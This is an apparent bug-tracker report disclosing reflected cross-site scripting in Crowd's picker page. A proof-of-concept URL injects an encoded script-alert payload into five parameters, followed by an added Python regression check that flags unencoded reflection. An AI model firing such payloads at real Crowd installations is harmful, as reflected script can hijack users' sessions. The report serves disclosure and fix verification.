  1. Crowd Data Center
  2. CWD-3759

Cross Site Scripting vulnerabilities in Pickers


Details

    Description

      Currently, the Confluence picker does not sanitize the input (<crowd-url>/crowd/console/secure/pickers/displayPicker.action).

      Proof of concept.

      1. Access the following URL in your browser with JavaScript enabled. Replace <crowd-url> with your Crowd URL.

        <crowd-url>/crowd/console/secure/pickers/displayPicker.action?searchURL=%3E%22%27%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&actionURL=%3E%22%27%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&actionName=%3E%22%27%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&initialMessage=%3E%22%27%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&finalURL=%3E%22%27%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E

      2. You will see the following alert:
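
Added example, not part of the original report or of Crowd's code: a regression check that flags any of the five picker parameters reflected into a response without HTML encoding. The `render_page` template and the `crowd.example.test` host are constructed stand-ins, since the report does not show how the picker page renders these values.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Parameters named in the report's proof-of-concept URL.
PICKER_PARAMS = ("searchURL", "actionURL", "actionName", "initialMessage", "finalURL")
# Characters that must not survive unencoded in HTML text or attribute context.
HTML_SPECIAL = set("<>\"'&")


def unescaped_reflections(request_url, response_body):
    """Return the picker parameters whose decoded value appears verbatim in the body.

    Only values containing HTML metacharacters are considered: a plain
    alphanumeric value reflected as-is is harmless and would only add noise.
    """
    query = parse_qs(urlsplit(request_url).query, keep_blank_values=True)
    findings = []
    for name in PICKER_PARAMS:
        for value in query.get(name, []):
            if HTML_SPECIAL & set(value) and value in response_body:
                findings.append(name)
                break
    return findings


def render_field(name, value, encode):
    """Constructed stand-in for the picker template: one hidden input per parameter."""
    shown = html.escape(value, quote=True) if encode else value
    return '<input type="hidden" name="%s" value="%s">' % (name, shown)


def render_page(request_url, encode):
    """Render all five parameters, with or without output encoding (assumed template)."""
    query = parse_qs(urlsplit(request_url).query, keep_blank_values=True)
    return "\n".join(render_field(n, query.get(n, [""])[0], encode) for n in PICKER_PARAMS)


# Constructed request reusing the marker value from the report; the host is a placeholder.
MARKER = "%3E%22%27%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E"
SAMPLE_URL = ("https://crowd.example.test/crowd/console/secure/pickers/displayPicker.action?"
              + "&".join("%s=%s" % (p, MARKER) for p in PICKER_PARAMS))

if __name__ == "__main__":
    print("unencoded:", unescaped_reflections(SAMPLE_URL, render_page(SAMPLE_URL, encode=False)))
    print("encoded:  ", unescaped_reflections(SAMPLE_URL, render_page(SAMPLE_URL, encode=True)))
```

Run against a real response body in place of `render_page`, an empty result after the fix indicates that all five parameters are encoded on output.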


            People

              jwalton joe
              jcheok Jing Hwa Cheok (Inactive)
